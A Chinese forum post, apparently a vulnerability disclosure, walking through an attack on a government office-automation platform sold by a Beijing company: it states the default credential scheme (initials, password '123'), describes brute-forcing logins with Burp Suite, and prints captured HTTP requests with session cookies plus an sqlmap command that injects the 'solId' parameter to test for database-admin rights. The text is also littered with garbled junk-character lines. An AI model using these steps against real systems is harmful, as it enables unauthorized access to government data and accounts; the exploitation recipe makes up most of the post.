|
3 t j; Y% ?) e# |
5 t- t/ |6 H0 o9 Z6 E
! Q1 b* v- W5 `, N, _3 y; g3 n
平台简介:
4 y2 O' M* M7 {* D. v , G, ]- Y5 w2 k0 b; z
' {' ]( x) W2 q/ X6 y* n$ \/ k
- k: v8 \: J# n# m
% r6 D) U1 c0 S7 z7 Q9 H( _0 H
6 r0 L( R5 s) g4 ]" E( F0 G% [% | 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
+ E1 @% Z/ r3 u! g. n) }同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
, M1 F) x0 m- ?: ~同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!0 `4 u1 K4 D5 M' A. S
# z S: l/ n3 _3 x' l! |
: V. b: {, |: f" }0 V$ l0 L/ L3 D
$ ~8 N% x7 z3 f9 v$ ~, o- @) F
* q; q& ?" ]0 c# U+ [( Z# _; K2 D3 E! p* u' q- p$ J6 T
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:5 w' N9 n$ m- U: z b: p
, o! d: r2 D( f' x0 l
: s+ \3 k1 m2 ~5 U3 o3 Y
: @" i# l/ X" _( ^
: j% S$ G# K4 m
7 Q; Q9 N2 t! V5 E% ]
http://1.1.1.1:7197/cap-aco/#(案例2-)8 l9 \2 @* v; u& j8 H$ H
+ X5 _6 M( x- x- G. T; X: y, U
/ T5 A9 y& h4 o2 |2 Q http://www.XXOO.com (案例1-官网网站)
, ~% @2 p5 ]+ T3 k! l+ L. j7 o3 S% ` " L! C/ a7 C2 R
. p9 z) r( I e B. b; C5 f
}- D- b! W( } 6 `8 [' K3 b9 v$ f
, _ w ~# Y6 I 漏洞详情:9 {2 z# y" W. x) S8 F
+ a/ Y1 a- q1 D4 R, N
- w# n/ b) G# p 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
0 Y. h l y' r | 4 A; {* L) B8 l" x7 |- j: }7 J
' E' ^) {& l. I" o
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:8 X7 t, g) y$ E3 J
' [$ q/ C2 H+ v0 c5 ~8 A* Y
/ \- f8 V& b9 q2 u0 P8 l * n% }( }5 z* a0 c+ [9 ~1 W3 p
. e0 g9 ?8 r" W: f3 y# O8 x
3 d5 m; L( h, u+ [( P
! I/ y8 K- y* p' p w& @2 |
% j) k" g# O) L2 q' j+ k) S5 g
& m( Z% N" g0 r+ G5 M) U0 `& [1 n# B status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:8 M' `7 i4 j8 u6 q. b* R+ S; E
1 u( E4 @- a) M& X$ {: f
- {, M: s* p H* @& d3 P7 p
1、案例1-官方网站
3 m( c/ e9 J. N( U
! b' w% X$ o- Q6 u4 y+ _# T4 i3 _3 |* W3 [
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
* e( e7 \0 Q" ^. n9 ]- v) M + _& P0 t$ X& T- U: X* g6 z! Z1 @
6 Q' {& V# s7 q1 t9 U Host: www.XXOO.com9 x# G b P$ x1 @+ G7 j; R/ K0 Q
& q7 p5 }7 H+ v8 `" V Q D8 C
4 M4 @7 d/ \& a5 ]6 M, \ Proxy-Connection: Keep-Alive
0 H" H: C W8 J- E + A8 w2 g: o8 j
; |# y7 \3 q1 `) ?$ k
Accept: application/json, text/javascript, */*; q=0.01
0 z" j. S5 v3 M! ~ 2 f+ p& @3 _/ V# a( _
1 ` C: x+ U% d, e& K. g
Accept-Language: zh-CN p; i) y% v! ^2 o, c+ B& K4 i0 T
: l+ R. c7 ?. |- X6 [8 K
# \- [! j$ g' M1 Z+ \9 j Content-Type: application/json
2 {8 I6 D4 @1 _6 T7 N, g# i
: `! o% {2 W8 {. }3 m! W
* V% Y d2 O; o: X7 _& K User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko K$ q$ H# M R# v% [8 b6 }0 S2 T
0 U* r1 f: i. O# f3 K6 z' V. K/ w
& O8 I% v) A% N( t) t
X-Requested-With: XMLHttpRequest- h, o( h# Y8 c2 h
4 F i* u" D, b
, f2 \ [$ T$ ?3 V; ~( n3 B+ W5 F# D
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
) ]" M+ `, q- U- @$ J% [
: P0 ?: s: h* Z. ]6 q9 N4 x, X: L' e) ]4 _/ ^5 o4 N, |/ N- n" ]
Accept-Encoding: gzip, deflate, sdch) g5 D/ u9 e; U' {& _
3 o# [1 R) `0 V, r
# s& h; I9 e& C Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
) O- ^ w/ h' {5 f( u# | , [& c. ^9 Y$ g* r# d$ }
" p- p+ ?8 D6 A8 }
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
( M" l, x7 ]) i; `, {' g : z8 q# J7 C: @* V
% I% u# X4 a# J8 f3 ] 
9 M) Q; |: T, Q; _' v2 R % c0 y9 y: T/ U& y$ ^6 W
: ]& B2 J, X6 Y5 a% v( x$ v! s' j2 k$ y  . g: ]; P* ?/ X8 ]
; ^: g1 k7 a* r) y2 R! L. O' S( G X u5 v9 c- P [) S6 N
. d4 O, ]6 Y6 ~$ l
2 v. F6 Y, ]: J7 B* i+ M/ U0 P! Y( F8 I* m, j
2 g( y, D+ b7 [. m& z) \
5 J: {$ ^ z" K
' i! L: o5 ]" x; {6 u- x+ t 9 {; g; V, L& e# S7 z
2 ^# {2 o0 C" o) b0 |+ V7 A2 y. }( U- x/ d# }
2、案例2-某天河云平台# u, B9 f9 J. W, r- X; q
+ n- C) P, M7 i! s4 r1 a7 p I* K
) F% G9 U. q0 d& \# M! F
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
6 j$ |( A, I( [) p$ Z" ^# q7 I 2 g/ f- d7 A% O- \5 f) d
" r/ ]+ [& s w: W. ~, I2 j7 B6 m
Host: 1.1.1.:7197/ B1 c# W! {- i W
$ v$ R# {' M$ L# }
7 Q1 }) e0 j: _" J* B) n Accept: application/json, text/javascript, */*; q=0.01; z) X b* Y; G5 a* h W0 t7 j8 X# _
% s, v3 M- J9 ~
( @. K1 Z: y' l# @: \# d. X* o X-Requested-With: XMLHttpRequest
# I$ r! t3 d% z4 I% ~
, a. U/ f0 g6 i6 F+ e6 U, _, c( b0 P
6 h3 E& w* I8 N2 f4 l9 Q User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0: P1 B! Q6 S7 z/ T3 m- ~
. E' Q1 P5 J/ m
5 v4 y) X$ b2 g Content-Type: application/json" [( t w7 e6 V2 f3 o
' J$ E# l. q, K3 T5 m4 u0 _7 U
0 z2 e4 x0 M- s6 r Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
& b, v" }7 U. [" G
7 Q: p: c/ o% x* `2 K, s$ t* ?7 q* d* e% Y( @9 y& ?$ J: U9 L$ \
Accept-Language: zh-CN,zh;q=0.8
& x1 t9 h0 A6 L5 q9 |; _; S
; m {) p8 C/ R* L
' T# a" z/ R$ s0 a+ n Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
& h4 W* s7 U* z 9 h+ X5 z9 t7 C: @
& V/ o2 {8 { y! l/ E1 H C
Connection: close
% O( Q$ t3 c6 @/ F9 N' ]4 g7 A
5 H' @6 {% y, j! O0 A; C( J
* q) N3 P* b+ D) L# m( [ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:. v; } I0 a0 M3 j: a/ b8 j8 h
& S% C- F4 p/ a- D1 n& W9 v0 e& N( H. ^
3 T' p& M( |: P i  W! m" E! |0 B8 D
, P5 m/ C& y2 g: Z* |
- }9 ^% Y/ [0 C- g, o+ t
) C( x8 V" C3 T9 K
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对